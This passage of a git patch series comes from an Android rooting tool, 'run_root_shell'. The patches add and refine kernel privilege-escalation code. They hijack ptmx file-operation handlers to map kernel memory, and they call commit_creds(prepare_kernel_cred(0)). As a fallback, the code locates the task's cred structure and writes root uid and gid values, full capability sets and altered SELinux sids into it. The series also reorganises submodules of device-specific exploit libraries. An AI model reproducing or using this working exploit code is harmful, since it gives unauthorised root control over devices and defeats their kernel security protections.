!= hint->tty_fasync_address) { + continue; + } + + ptmx_fops = (void *)convert_to_kernel_address(address, mem) - 0x24; + return true; } - ptmx_fops = (void *)convert_to_kernel_address(address, mem) - 0x24; - return true; + return false; } From f029ae8af8a8d0cf3124694fb59770002a84ca2a Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 6 Dec 2013 20:03:59 +0900 Subject: [PATCH 097/125] Use sqlite3 database --- .gitmodules | 3 +++ device_database | 2 +- libsqlite | 1 + 3 files changed, 5 insertions(+), 1 deletion(-) create mode 160000 libsqlite diff --git a/.gitmodules b/.gitmodules index f457376..c257cea 100644 --- a/.gitmodules +++ b/.gitmodules @@ -31,3 +31,6 @@ [submodule "libget_user_exploit"] path = libget_user_exploit url = https://github.com/fi01/libget_user_exploit.git +[submodule "libsqlite"] + path = libsqlite + url = https://github.com/android-rooting-tools/android_libsqlite.git diff --git a/device_database b/device_database index cf3853a..f6a1b9f 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit cf3853a407efbbb8222f0b21e7a24729a274010f +Subproject commit f6a1b9f12b0e296dcf36c6bb727dbef7ab0f7498 diff --git a/libsqlite b/libsqlite new file mode 160000 index 0000000..a3b9d6e --- /dev/null +++ b/libsqlite @@ -0,0 +1 @@ +Subproject commit a3b9d6ed247e201e4969d2fdd0eed28f07605550 From 05b7f10c4b862be34c772c3176a6c467a44e05c3 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 7 Dec 2013 13:58:13 +0900 Subject: [PATCH 098/125] Register device and addresses if it founds them out --- device_database | 2 +- main.c | 7 +++++++ 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/device_database b/device_database index f6a1b9f..33e1444 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit f6a1b9f12b0e296dcf36c6bb727dbef7ab0f7498 +Subproject commit 33e1444aa373784f6dec282eaedbf57471162cba diff --git a/main.c b/main.c index d6554ba..e839173 100644 --- a/main.c +++ b/main.c @@ -11,6 +11,7 @@ #include #include +#include "device_database.h" #include "cred.h" #include "mm.h" #include "ptmx.h" @@ -145,6 +146,12 @@ setup_variables(void) printf(" commit_creds = %p\n", commit_creds); printf(" ptmx_fops = %p\n", ptmx_fops); +#ifdef HAS_SET_SYMBOL_ADDRESS + device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); + device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); + device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); +#endif /* HAS_SET_SYMBOL_ADDRESS */ + return true; } From 9442fea1bf48276c6356194b7d558da691a8a834 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 7 Dec 2013 18:48:56 +0900 Subject: [PATCH 099/125] update subprojects --- device_database | 2 +- libsqlite | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 33e1444..7ce318e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 33e1444aa373784f6dec282eaedbf57471162cba +Subproject commit 7ce318ef25308b46b8279c94561e38b5fe06d239 diff --git a/libsqlite b/libsqlite index a3b9d6e..49e176c 160000 --- a/libsqlite +++ b/libsqlite @@ -1 +1 @@ -Subproject commit a3b9d6ed247e201e4969d2fdd0eed28f07605550 +Subproject commit 49e176c19a639bbc47afc17b9ebb641c23049d64 From eb964a938cf53bc3f9178fda707e339f9f9014ea Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 10 Dec 2013 16:28:57 +0900 Subject: [PATCH 100/125] Fix error messages --- main.c | 6 +++--- mm.c | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/main.c b/main.c index e839173..60f5cc0 100644 --- a/main.c +++ b/main.c @@ -156,15 +156,15 @@ setup_variables(void) } if (!prepare_kernel_cred) { - printf("Failed to get prepare_kernel_cred addresses.\n"); + printf("Failed to get prepare_kernel_cred address.\n"); } if (!commit_creds) { - printf("Failed to get commit_creds addresses.\n"); + printf("Failed to get commit_creds address.\n"); } if (!ptmx_fops) { - printf("Failed to get ptmx_fops addresses.\n"); + printf("Failed to get ptmx_fops address.\n"); } print_reason_device_not_supported(); diff --git a/mm.c b/mm.c index 03d9e94..f155cd0 100644 --- a/mm.c +++ b/mm.c @@ -166,13 +166,13 @@ run_with_mmap(memory_callback_t callback) setup_remap_pfn_range_address(); if (!remap_pfn_range) { - printf("You need to manage to get remap_pfn_range addresses.\n"); + printf("You need to manage to get remap_pfn_range address.\n"); return false; } setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { - printf("You need to manage to get ptmx_fops addresses.\n"); + printf("You need to manage to get ptmx_fops address.\n"); return false; } @@ -181,7 +181,7 @@ run_with_mmap(memory_callback_t callback) set_kernel_phys_offset(kernel_physical_offset - 0x00008000); } else if (!detect_kernel_phys_parameters()) { - printf("You need to manage to get kernel_physical_offset addresses.\n"); + printf("You need to manage to get kernel_physical_offset address.\n"); return false; } From 50b9602b91dd0ccb1e5d8ad4506bbe7698f8f8fc Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 10 Dec 2013 22:37:31 +0900 Subject: [PATCH 101/125] Fixed crash when it installs ptmx_fops.mmap handler by libput_user_exploit, that breaks ptmx_fops.open handler. --- mm.c | 47 ++++++++++++++++++++++++++++++++++++++++------- 1 file changed, 40 insertions(+), 7 deletions(-) diff --git a/mm.c b/mm.c index f155cd0..44419f6 100644 --- a/mm.c +++ b/mm.c @@ -87,16 +87,41 @@ detect_kernel_phys_parameters(void) return true; } +static void *old_mmap_handler; + int ptmx_mmap(struct file *filep, struct vm_area_struct *vma) { - return remap_pfn_range(vma, vma->vm_start, - kernel_phys_offset >> PAGE_SHIFT, - vma->vm_end - vma->vm_start, vma->vm_page_prot); + void **p; + int ret; + + p = (void **)ptmx_fops_mmap_address; + + ret = remap_pfn_range(vma, vma->vm_start, + kernel_phys_offset >> PAGE_SHIFT, + vma->vm_end - vma->vm_start, vma->vm_page_prot); + + if (p) { + *p = old_mmap_handler; + } + + return ret; +} + +static void +setup_mmap_by_fsync(void) +{ + void **p; + + p = (void **)ptmx_fops_mmap_address; + if (p) { + old_mmap_handler = *p; + *p = (void *)&ptmx_mmap; + } } static bool -run_callback_with_mmap(void *user_data) +run_callback_with_fsync_and_mmap(void *user_data) { int fd; void *address; @@ -105,6 +130,8 @@ run_callback_with_mmap(void *user_data) bool ret; fd = open(PTMX_DEVICE, O_RDWR); + fsync(fd); + address = mmap(start_address, KERNEL_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FIXED, fd, 0); @@ -170,6 +197,12 @@ run_with_mmap(memory_callback_t callback) return false; } + setup_ptmx_fops_fsync_address(); + if (!ptmx_fops_fsync_address) { + printf("You need to manage to get ptmx_fops address.\n"); + return false; + } + setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { printf("You need to manage to get ptmx_fops address.\n"); @@ -185,9 +218,9 @@ run_with_mmap(memory_callback_t callback) return false; } - return attempt_exploit(ptmx_fops_mmap_address, - (unsigned long int)&ptmx_mmap, 0, - run_callback_with_mmap, callback); + return attempt_exploit(ptmx_fops_fsync_address, + (unsigned long int)&setup_mmap_by_fsync, 0, + run_callback_with_fsync_and_mmap, callback); } static bool From fb2f548f04a195776480d08726b094b947d26665 Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 23 Dec 2013 02:55:25 +0900 Subject: [PATCH 102/125] update subprojects --- device_database | 2 +- libmsm_acdb_exploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 7ce318e..b0d1a6c 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 7ce318ef25308b46b8279c94561e38b5fe06d239 +Subproject commit b0d1a6ca1a2d8459bc8ddd6625af8525a66a705a diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit index 4ea9f84..fad9d66 160000 --- a/libmsm_acdb_exploit +++ b/libmsm_acdb_exploit @@ -1 +1 @@ -Subproject commit 4ea9f847e2ffd8077d493c45e6a4973b4929688f +Subproject commit fad9d66d9793b4c44049a00fcb85be0ad05b6035 From 8ca2228c1e9acf78b38d684a0fbb5b709608ef95 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 25 Dec 2013 08:35:06 +0900 Subject: [PATCH 103/125] update subprojects --- libexploit | 2 +- libkallsyms | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/libexploit b/libexploit index 76252ed..668780f 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 76252ed65f67a87402628d2d12f38f30550d2287 +Subproject commit 668780f94d953d1fab30dec8d98722017becdf8d diff --git a/libkallsyms b/libkallsyms index 49f2ec7..4e8d619 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 49f2ec7bce717e1b64f5d22270cbdb452236648e +Subproject commit 4e8d619dd4be4fecf5eb6ea36d6d2fd14e6c32a0 From feb457c0e38d16f408d784fe868181433ff6e24d Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 25 Dec 2013 13:03:14 +0900 Subject: [PATCH 104/125] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index b0d1a6c..57ab9a7 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit b0d1a6ca1a2d8459bc8ddd6625af8525a66a705a +Subproject commit 57ab9a7bfd9df4dd0774b98ceb4041435a8a0da3 From e346a4398d9622ce0ab76201e55b62d2203ee0ac Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 17 Jan 2014 18:23:53 +0900 Subject: [PATCH 105/125] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 57ab9a7..0710f26 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 57ab9a7bfd9df4dd0774b98ceb4041435a8a0da3 +Subproject commit 0710f266b7969a70d70a534a199205babbe90493 From 39fb283070b6543d39f8b2f38763c2bbe4a847ef Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Fri, 2 May 2014 19:27:20 +0900 Subject: [PATCH 106/125] libsqlite has been moved into device_database. --- .gitmodules | 3 --- device_database | 2 +- libsqlite | 1 - 3 files changed, 1 insertion(+), 5 deletions(-) delete mode 160000 libsqlite diff --git a/.gitmodules b/.gitmodules index c257cea..f457376 100644 --- a/.gitmodules +++ b/.gitmodules @@ -31,6 +31,3 @@ [submodule "libget_user_exploit"] path = libget_user_exploit url = https://github.com/fi01/libget_user_exploit.git -[submodule "libsqlite"] - path = libsqlite - url = https://github.com/android-rooting-tools/android_libsqlite.git diff --git a/device_database b/device_database index 0710f26..21abb64 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 0710f266b7969a70d70a534a199205babbe90493 +Subproject commit 21abb64b14deb0cbf1279e319539dc8217c77952 diff --git a/libsqlite b/libsqlite deleted file mode 160000 index 49e176c..0000000 --- a/libsqlite +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 49e176c19a639bbc47afc17b9ebb641c23049d64 From f31810f8075771f56da4a08948343f01af6890fe Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Fri, 2 May 2014 20:11:57 +0900 Subject: [PATCH 107/125] All exploit libraries has been moved into libexploit/. --- .gitmodules | 24 ------------------------ Android.mk | 8 -------- libdiagexploit | 1 - libexploit | 2 +- libfb_mem_exploit | 1 - libfj_hdcp_exploit | 1 - libget_user_exploit | 1 - libmsm_acdb_exploit | 1 - libmsm_cameraconfig_exploit | 1 - libperf_event_exploit | 1 - libput_user_exploit | 1 - 11 files changed, 1 insertion(+), 41 deletions(-) delete mode 160000 libdiagexploit delete mode 160000 libfb_mem_exploit delete mode 160000 libfj_hdcp_exploit delete mode 160000 libget_user_exploit delete mode 160000 libmsm_acdb_exploit delete mode 160000 libmsm_cameraconfig_exploit delete mode 160000 libperf_event_exploit delete mode 160000 libput_user_exploit diff --git a/.gitmodules b/.gitmodules index f457376..d56e434 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,33 +1,9 @@ -[submodule "libdiagexploit"] - path = libdiagexploit - url = git://github.com/android-rooting-tools/libdiagexploit.git [submodule "device_database"] path = device_database url = git://github.com/android-rooting-tools/android_device_database.git -[submodule "libperf_event_exploit"] - path = libperf_event_exploit - url = git://github.com/android-rooting-tools/libperf_event_exploit.git -[submodule "libmsm_acdb_exploit"] - path = libmsm_acdb_exploit - url = git://github.com/fi01/libmsm_acdb_exploit.git -[submodule "libfj_hdcp_exploit"] - path = libfj_hdcp_exploit - url = git://github.com/fi01/libfj_hdcp_exploit.git [submodule "libkallsyms"] path = libkallsyms url = https://github.com/android-rooting-tools/libkallsyms.git -[submodule "libfb_mem_exploit"] - path = libfb_mem_exploit - url = https://github.com/android-rooting-tools/libfb_mem_exploit.git [submodule "libexploit"] path = libexploit url = https://github.com/android-rooting-tools/libexploit.git -[submodule "libmsm_cameraconfig_exploit"] - path = libmsm_cameraconfig_exploit - url = git://github.com/fi01/libmsm_cameraconfig_exploit.git -[submodule "libput_user_exploit"] - path = libput_user_exploit - url = https://github.com/fi01/libput_user_exploit.git -[submodule "libget_user_exploit"] - path = libget_user_exploit - url = https://github.com/fi01/libget_user_exploit.git diff --git a/Android.mk b/Android.mk index cbfdb80..9a4970f 100644 --- a/Android.mk +++ b/Android.mk @@ -13,14 +13,6 @@ LOCAL_MODULE := run_root_shell LOCAL_MODULE_TAGS := optional LOCAL_STATIC_LIBRARIES := libdevice_database LOCAL_STATIC_LIBRARIES += libexploit -LOCAL_STATIC_LIBRARIES += libdiagexploit -LOCAL_STATIC_LIBRARIES += libperf_event_exploit -LOCAL_STATIC_LIBRARIES += libmsm_acdb_exploit -LOCAL_STATIC_LIBRARIES += libfj_hdcp_exploit -LOCAL_STATIC_LIBRARIES += libfb_mem_exploit -LOCAL_STATIC_LIBRARIES += libmsm_cameraconfig_exploit -LOCAL_STATIC_LIBRARIES += libput_user_exploit -LOCAL_STATIC_LIBRARIES += libget_user_exploit LOCAL_STATIC_LIBRARIES += libkallsyms LOCAL_STATIC_LIBRARIES += libcutils libc LOCAL_LDFLAGS += -static diff --git a/libdiagexploit b/libdiagexploit deleted file mode 160000 index 4dd7f1b..0000000 --- a/libdiagexploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 4dd7f1b0dadb3ae5d8a914e1e22979c7bed3b6c3 diff --git a/libexploit b/libexploit index 668780f..82e235c 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 668780f94d953d1fab30dec8d98722017becdf8d +Subproject commit 82e235cf6d3d3d37132e10ac1767041943239bfa diff --git a/libfb_mem_exploit b/libfb_mem_exploit deleted file mode 160000 index de67230..0000000 --- a/libfb_mem_exploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit de67230ff25909fb38417490fee745925898009a diff --git a/libfj_hdcp_exploit b/libfj_hdcp_exploit deleted file mode 160000 index d1915b8..0000000 --- a/libfj_hdcp_exploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit d1915b8cb18c917340a83c6807c5a5fe1053902a diff --git a/libget_user_exploit b/libget_user_exploit deleted file mode 160000 index bedea14..0000000 --- a/libget_user_exploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit bedea14b5148931bf8bc98f8dfbac55f707a73ea diff --git a/libmsm_acdb_exploit b/libmsm_acdb_exploit deleted file mode 160000 index fad9d66..0000000 --- a/libmsm_acdb_exploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit fad9d66d9793b4c44049a00fcb85be0ad05b6035 diff --git a/libmsm_cameraconfig_exploit b/libmsm_cameraconfig_exploit deleted file mode 160000 index 5dd3072..0000000 --- a/libmsm_cameraconfig_exploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit 5dd3072fe63c8612aa2a63d48f40a450acb9c810 diff --git a/libperf_event_exploit b/libperf_event_exploit deleted file mode 160000 index db58c5d..0000000 --- a/libperf_event_exploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit db58c5d5767f007e3420c2232652506de787f6f0 diff --git a/libput_user_exploit b/libput_user_exploit deleted file mode 160000 index d437838..0000000 --- a/libput_user_exploit +++ /dev/null @@ -1 +0,0 @@ -Subproject commit d43783871e38a3d26fa8c4ecd50c9453f8fa5a78 From 99ad56d4eb1e87d7f47c093d2433b1933177ded5 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Fri, 2 May 2014 20:12:44 +0900 Subject: [PATCH 108/125] Update device_database. --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 21abb64..199a3c3 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 21abb64b14deb0cbf1279e319539dc8217c77952 +Subproject commit 199a3c3ab95ee1e150f51894f2647e91d4b0f42d From babe70a1e7cd25f619936bde789d5ef4dccbdeb9 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sat, 3 May 2014 08:45:27 +0900 Subject: [PATCH 109/125] Update device_database repository. --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 199a3c3..cfb7cc2 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 199a3c3ab95ee1e150f51894f2647e91d4b0f42d +Subproject commit cfb7cc26e8e53db838e07f9e469b77753fe1cd55 From d716a58f3227e03820f0b6ff8e0178ee53312bb4 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sat, 3 May 2014 12:45:31 +0900 Subject: [PATCH 110/125] Update device_database submodule. --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index cfb7cc2..9384566 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit cfb7cc26e8e53db838e07f9e469b77753fe1cd55 +Subproject commit 93845664231ae39825c0058a5d02088791ecc512 From 79bc66081085b48f028305dc858314026e330fa9 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sun, 4 May 2014 06:47:39 +0900 Subject: [PATCH 111/125] Expand tab. --- mm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/mm.c b/mm.c index 44419f6..ab913fd 100644 --- a/mm.c +++ b/mm.c @@ -220,7 +220,7 @@ run_with_mmap(memory_callback_t callback) return attempt_exploit(ptmx_fops_fsync_address, (unsigned long int)&setup_mmap_by_fsync, 0, - run_callback_with_fsync_and_mmap, callback); + run_callback_with_fsync_and_mmap, callback); } static bool From a62259fda3d46b5e7a637c6f5711ab5574b3d6ff Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sun, 1 Jun 2014 20:17:43 +0900 Subject: [PATCH 112/125] Update submodules. Use perf_swevent_enabled and delayed_rsp_id in device_database. --- device_database | 2 +- libexploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 9384566..5a65675 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 93845664231ae39825c0058a5d02088791ecc512 +Subproject commit 5a6567523c2e42c9d2c66fc9bc4661096c0af9a1 diff --git a/libexploit b/libexploit index 82e235c..558f198 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 82e235cf6d3d3d37132e10ac1767041943239bfa +Subproject commit 558f1983336fc5b1b91d9f8174a0739afbd386df From 6ba8012cc154559f16f458e7a92172078b0b2341 Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 6 Jun 2014 20:43:13 +0900 Subject: [PATCH 113/125] Update subprojects --- device_database | 2 +- libexploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 5a65675..78d13b5 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 5a6567523c2e42c9d2c66fc9bc4661096c0af9a1 +Subproject commit 78d13b55bec03205d855431382a0c5ef6047b076 diff --git a/libexploit b/libexploit index 558f198..49faf0d 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 558f1983336fc5b1b91d9f8174a0739afbd386df +Subproject commit 49faf0d15bcec8cf382d0abe32c99988db3eb606 From 0f5506d636d324426ae1a45b51ff0a80511d62d1 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sat, 13 Sep 2014 20:56:37 +0900 Subject: [PATCH 114/125] Update subprojects --- device_database | 2 +- libexploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 78d13b5..0bb5742 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 78d13b55bec03205d855431382a0c5ef6047b076 +Subproject commit 0bb5742fdf142e867e5d363a2b20954d2d7777a1 diff --git a/libexploit b/libexploit index 49faf0d..970524b 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 49faf0d15bcec8cf382d0abe32c99988db3eb606 +Subproject commit 970524b7f6e11486d0221c821ba02ded43a105da From ab89ba4f9780de15753bcc5436c67731f2ab2d38 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 17 Sep 2014 04:59:38 +0900 Subject: [PATCH 115/125] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index 970524b..adec2af 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 970524b7f6e11486d0221c821ba02ded43a105da +Subproject commit adec2af37ea2476df50e7805d79efa150fe73969 From 399199d54de64ac757ee1ea73a033fc4c992f7b4 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 17 Sep 2014 18:48:33 +0900 Subject: [PATCH 116/125] Update submodule --- libkallsyms | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libkallsyms b/libkallsyms index 4e8d619..6285f59 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 4e8d619dd4be4fecf5eb6ea36d6d2fd14e6c32a0 +Subproject commit 6285f5965df636d9787f3dc90e9352e9a4b3b020 From 17d68521b7c98782b219803bd215fe4a8f6f8d09 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 18 Sep 2014 00:15:02 +0900 Subject: [PATCH 117/125] Try to modify in struct cred directly when commit_creds() is failed. --- main.c | 174 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 173 insertions(+), 1 deletion(-) diff --git a/main.c b/main.c index 60f5cc0..0375271 100644 --- a/main.c +++ b/main.c @@ -18,10 +18,171 @@ #include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" +#define THREAD_SIZE 8192 + +#define KERNEL_START 0xc0000000 + +struct thread_info; +struct task_struct; +struct cred; +struct kernel_cap_struct; +struct task_security_struct; +struct list_head; + +struct thread_info { + unsigned long flags; + int preempt_count; + unsigned long addr_limit; + struct task_struct *task; + + /* ... */ +}; + +struct kernel_cap_struct { + unsigned long cap[2]; +}; + +struct cred { + unsigned long usage; + uid_t uid; + gid_t gid; + uid_t suid; + gid_t sgid; + uid_t euid; + gid_t egid; + uid_t fsuid; + gid_t fsgid; + unsigned long securebits; + struct kernel_cap_struct cap_inheritable; + struct kernel_cap_struct cap_permitted; + struct kernel_cap_struct cap_effective; + struct kernel_cap_struct cap_bset; + unsigned char jit_keyring; + void *thread_keyring; + void *request_key_auth; + void *tgcred; + struct task_security_struct *security; + + /* ... */ +}; + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +struct task_security_struct { + unsigned long osid; + unsigned long sid; + unsigned long exec_sid; + unsigned long create_sid; + unsigned long keycreate_sid; + unsigned long sockcreate_sid; +}; + + +struct task_struct_partial { + struct list_head cpu_timers[3]; + struct cred *real_cred; + struct cred *cred; + struct cred *replacement_session_keyring; + char comm[16]; +}; + +static inline struct thread_info * +current_thread_info(void) +{ + register unsigned long sp asm ("sp"); + return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); +} + +static bool +is_cpu_timer_valid(struct list_head *cpu_timer) +{ + if (cpu_timer->next != cpu_timer->prev) { + return false; + } + + if ((unsigned long int)cpu_timer->next < KERNEL_START) { + return false; + } + + return true; +} + +static void +obtain_root_privilege_by_modify_task_cred(void) +{ + struct thread_info *info; + struct cred *cred; + struct task_security_struct *security; + int i; + + info = current_thread_info(); + cred = NULL; + + for (i = 0; i < 0x400; i+= 4) { + struct task_struct_partial *task = ((void *)info->task) + i; + + if (is_cpu_timer_valid(&task->cpu_timers[0]) + && is_cpu_timer_valid(&task->cpu_timers[1]) + && is_cpu_timer_valid(&task->cpu_timers[2]) + && task->real_cred == task->cred) { + cred = task->cred; + break; + } + } + + if (cred == NULL) { + return; + } + + cred->uid = 0; + cred->gid = 0; + cred->suid = 0; + cred->sgid = 0; + cred->euid = 0; + cred->egid = 0; + cred->fsuid = 0; + cred->fsgid = 0; + + cred->cap_inheritable.cap[0] = 0xffffffff; + cred->cap_inheritable.cap[1] = 0xffffffff; + cred->cap_permitted.cap[0] = 0xffffffff; + cred->cap_permitted.cap[1] = 0xffffffff; + cred->cap_effective.cap[0] = 0xffffffff; + cred->cap_effective.cap[1] = 0xffffffff; + cred->cap_bset.cap[0] = 0xffffffff; + cred->cap_bset.cap[1] = 0xffffffff; + + security = cred->security; + if (security) { + if (security->osid != 0 + && security->sid != 0 + && security->exec_sid == 0 + && security->create_sid == 0 + && security->keycreate_sid == 0 + && security->sockcreate_sid == 0) { + security->osid = 1; + security->sid = 1; + } + } +} + +static void +obtain_root_privilege_by_commit_creds(void) +{ + commit_creds(prepare_kernel_cred(0)); +} + +static void (*obtain_root_privilege_func)(void); + void obtain_root_privilege(void) { - commit_creds(prepare_kernel_cred(0)); + if (obtain_root_privilege_func) { + obtain_root_privilege_func(); + } } static bool @@ -30,8 +191,19 @@ run_obtain_root_privilege(void *user_data) int fd; int ret; + obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; + fd = open(PTMX_DEVICE, O_WRONLY); + ret = fsync(fd); + + if (getuid() != 0) { + printf("commit_creds(): failed. Try to hack task->cred.\n"); + + obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; + ret = fsync(fd); + } + close(fd); return (ret == 0); From c94bb4a7016c66e6503d6e1f5f1f6cf0cc801142 Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 19 Sep 2014 02:19:19 +0900 Subject: [PATCH 118/125] Update submodule --- device_database | 2 +- libkallsyms | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 0bb5742..57dc3e3 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 0bb5742fdf142e867e5d363a2b20954d2d7777a1 +Subproject commit 57dc3e377e28663837c85d8ca9e1b1d1f9b0f8c9 diff --git a/libkallsyms b/libkallsyms index 6285f59..02d8e7e 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 6285f5965df636d9787f3dc90e9352e9a4b3b020 +Subproject commit 02d8e7e85bb88987b09a56ece6487ae890a51860 From 14d1bbefbca5e75ce020b1a60f1e4ff4a6962845 Mon Sep 17 00:00:00 2001 From: fi01 Date: Tue, 21 Oct 2014 20:05:26 +0900 Subject: [PATCH 119/125] Update device_database submodule. --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 57dc3e3..1fb787b 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 57dc3e377e28663837c85d8ca9e1b1d1f9b0f8c9 +Subproject commit 1fb787ba27950bdac50c67fa7371c2e53cd0de03 From 61ea53b308457fb73f5875518cc992694ededd3e Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 5 Oct 2015 22:41:27 +0900 Subject: [PATCH 120/125] Improve cred address detection --- main.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/main.c b/main.c index 0375271..7ea6ff7 100644 --- a/main.c +++ b/main.c @@ -116,9 +116,11 @@ obtain_root_privilege_by_modify_task_cred(void) struct thread_info *info; struct cred *cred; struct task_security_struct *security; + unsigned long addr_limit; int i; info = current_thread_info(); + addr_limit = info->addr_limit; cred = NULL; for (i = 0; i < 0x400; i+= 4) { @@ -127,6 +129,7 @@ obtain_root_privilege_by_modify_task_cred(void) if (is_cpu_timer_valid(&task->cpu_timers[0]) && is_cpu_timer_valid(&task->cpu_timers[1]) && is_cpu_timer_valid(&task->cpu_timers[2]) + && (unsigned long)task->cred >= addr_limit && task->real_cred == task->cred) { cred = task->cred; break; From f06f9fc9692c3de3a64a527ff3ae34b683490393 Mon Sep 17 00:00:00 2001 From: fi01 Date: Mon, 5 Oct 2015 22:41:45 +0900 Subject: [PATCH 121/125] Update submodule --- device_database | 2 +- libexploit | 2 +- libkallsyms | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/device_database b/device_database index 1fb787b..0ddc260 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 1fb787ba27950bdac50c67fa7371c2e53cd0de03 +Subproject commit 0ddc2604131fbd93d48524d3dab95eb050ed608f diff --git a/libexploit b/libexploit index adec2af..5faee5e 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit adec2af37ea2476df50e7805d79efa150fe73969 +Subproject commit 5faee5ece8afd04dcfea93ddd6800431851db9f9 diff --git a/libkallsyms b/libkallsyms index 02d8e7e..ff8ded7 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 02d8e7e85bb88987b09a56ece6487ae890a51860 +Subproject commit 